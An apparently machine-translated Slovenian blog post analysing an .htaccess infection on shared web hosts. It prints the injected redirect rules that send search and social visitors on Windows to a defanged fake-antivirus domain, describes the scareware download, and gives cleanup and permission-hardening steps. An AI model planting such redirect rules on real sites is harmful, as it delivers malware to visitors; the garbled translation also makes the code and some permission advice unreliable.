Nova oblika virusa kar vidim jaz ne vem veliko, vpliva na straneh gostuje na nezanesljivih strežnikov kjer je med njimi mogoče "videti" uporabniške račune / poddomene. Natančneje, vsi računi za gostovanje so shranjeni v mapi "vhosts“, In pravica do pisanja Mapa uporabnik od "vhosts" v večini primerov dobi preprodajalec ... preprodajalec. To je tipična metoda spletnih strežnikov, ki jih ne uporabljajo WHM / cPanel.
Kuprini
Dejanje virusa .Htaccess - kramp .htaccess
Virus vplivajo datotek .htaccess Stran žrtve. Dodal sem linij / Direktiva za preusmeriti obiskovalce (prihajajo iz yahoo, msn, google, facebook, yaindex, twitter, myspace itd. spletna mesta in portali z velikim prometom) na nekatera spletna mesta, ki ponujajo "Protivirusni“. To je približno ponaredek protivirusni, Kar sem zapisal v uvodu k Fake Antivirus Remover.
Tukaj je tisto, kar je videti kot .htaccess vpliva: (ne dostopa do vsebin spletnih naslovov v naslednjih vrsticah)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine On
RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * VKontakte. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Živo. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Obvezna. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Scene. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. *wordpress. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * HotBot. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Pojdi. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * AlltheWeb. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Iskanje. * $ [NC, ALI]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,ALI]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]
Tisti, ki uporabljajo WordPress te vrstice bodo našli v datoteki .htaccess iz public_html. Poleg tega je virus ustvari. Identičen htaccess v mapi wp-content.
*Obstajajo tudi primeri, v katerih namesto pride peoriavascularsurgery.com dns.thesoulfoodcafe.com ali druge naslove.
Kaj naredi ta virus.
Ko preusmerjen, je obiskovalec pozdravili z odprtimi rokami, s sporočilom:
Opozorilo!
Vaš računalnik vsebuje različne znake prisotnosti virusov in zlonamerne programske opreme. vaš system zahteva takojšen pregled virusa!
System Varnost bo izvedla hitro in brezplačno skeniranje vašega računalnika na viruse in zlonamerne programe.
Ne glede na to, na kateri gumb pritisnemo, bomo preusmerjeni na stran "Moj računalnik", Ustvarjeno za posnemanje Oblikovanje XP. Tu se samodejno začne "postopek skeniranja", na koncu katerega ugotovimo, da "smo okuženi".
Ko kliknete OK ali Cancel, se bo začela prenesiDatoteka je setup.exe. To setup.exe je ponaredek anti virus vpliva na sistem. Namestite nekaj malware propagirajo nadaljnje povezave virus, in poleg teh protivirusno programsko opremo (tudi ponaredek), ki ga žrtev povabi k nakupu.
Tisti, ki so že stopili v stik z virusom, lahko uporabite ta obrazec Fake Antivirus Remover. Priporočljivo je tudi, da skeniranje celotnega HDD. Priporočamo Kaspersky Internet Security ali Kaspersky Anti-Virus.
Ta tip virusa prizadene Visitor operacijske sisteme OS Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Do zdaj ni znanih primerov okužbe operacijskih sistemov Windows Videti da Windows 7.
Kako je mogoče odstraniti ta virus. Htaccess na strežniku, in kako preprečiti okužbo.
1. Analizira sumljive datoteke in brisanje kod. Da bi zagotovili, da se datoteka ne samo vpliva .htaccess Bolje je analizirati vse datoteke . PHP si . Js.
2. Reportaža datoteko. Htaccess in sem iz chmod 644 ali 744 z dostopom pisanja samo uporabnik lastnik.
3. Ko ustvarite račun gostovanje za spletno stran v mapo / Domov ali / Webroot To bo samodejno ustvari mapo, ki ima pogosto uporabniškega imena (Uporabnik za cpanel, ftp, Itd). Da bi preprečili pisanje podatkov in prenosa virusov iz enega uporabnika na drugega, je priporočljivo, da za vsako mapo uporabnik določi:
chmod 644 ali 744, 755 – 644 je navedeno.
chown -R uporabniško ime ime_mape.
CHGRP-R nume_user nume_folder
ls-all načinov za preverjanje, če so pravilno izvedena. , Bi morale biti nekako takole:
drwx - x - x 12 dinamics dinamics 4096 6. maj 14:51 dinamics /
drwx - x - x 10 duran duran 4096 7. mar. 07:46 duran /
drwx - x - x 12 epruveta epruveta 4096 29. januar 11:23 epruveta /
drwxr-xr-x 14 express express 4096 26. februar 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19. maj 01:09 ezo /
drwx - x - x 9 farma farma 4096 19. december 22:29 farma /
Če bo eden od zgoraj, userele FTP Okužene datotekeNe more poslati virus na druge uporabnike gostitelja. To je minimalna varnostna mreža za zaščito računov gostuje na spletni strežnik.
Skupni elementi področjih, ki jih ta tip virusa.
Vse prizadete domene preusmerijo obiskovalce na spletna mesta, ki vsebujejo ime domene "/main.php? s = 4 & H".
Ta "virus. htaccess"Vpliva na katero koli vrsto sistema upravljanja vsebin (joomla, WordPress, phpBBItd), ki uporablja .htaccess.
.htaccess Virus kramp in preusmeritev.
